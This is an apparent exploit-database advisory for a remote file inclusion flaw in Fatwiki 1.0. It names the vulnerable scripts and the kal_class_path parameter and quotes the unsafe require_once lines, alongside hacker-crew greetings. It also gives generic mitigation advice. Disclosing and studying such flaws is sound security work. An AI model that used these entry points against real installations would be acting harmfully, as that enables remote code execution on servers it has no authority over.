Fatwiki (fwiki) Remote FiLe include RFI

vendor:

Fatwiki

by:

kaMtiEz

7,5

CVSS

HIGH

RFI

CWE

Product Name: Fatwiki

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:galupki:fatwiki

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Fatwiki (fwiki) Remote FiLe include RFI

Fatwiki (fwiki) is vulnerable to Remote File Include (RFI) vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, containing arbitrary code. This code is then executed by the web server.

Mitigation:

The best way to mitigate RFI attacks is to restrict the files that can be included. This can be done by using a whitelist of files that can be included, or by using a blacklist of files that cannot be included. Additionally, input validation should be used to ensure that user-supplied input is not used to include files.

Source

Exploit-DB raw data:

#############################################################################################################
## Fatwiki (fwiki) Remote FiLe include RFI			                                           ##
## Author : kaMtiEz (kamzcrew@yahoo.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : 10 januari, 2010 						                                   ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://galupki.de/
[+] Download : http://galupki.de/zip/fwiki_10b.zip
[+] version : 1.0
[+] Vulnerability : RFI
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/datumscalc.php?kal_class_path=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/monatsblatt.php?kal_class_path=[INDONESIANCODER]

[ BUG ]

[!] datumscalc.php
     - require_once("$kal_class_path/kalender.class.php");
     - require_once("$kal_class_path/feiertage.class.php");
     - require_once("$kal_class_path/sonnemond.class.php");

[!] monatsblatt.php
     - require_once("$kal_class_path/kalender.class.php");
     - require_once("$kal_class_path/feiertage.class.php");
     - require_once("$kal_class_path/sonnemond.class.php");
     - require_once("$kal_class_path/minikal.php");

[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,gonzhack ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Babe enyak adek i love u pull dah .. 
[+] to someone u will be p0wned :P
[+] Tukulesto : kapan keliling kota lagi ?? hahaha
[+] gonzhack : semoga balikan ya s0b .. ane dukung ..
[+] cimpli : janganlah bermimpi tentang menikahi Maria Ozawa .. hahahhah

[ QUOTE ]

[+] we are not dead .. INDONESIANCODER still r0x !
[+] nothing secure ..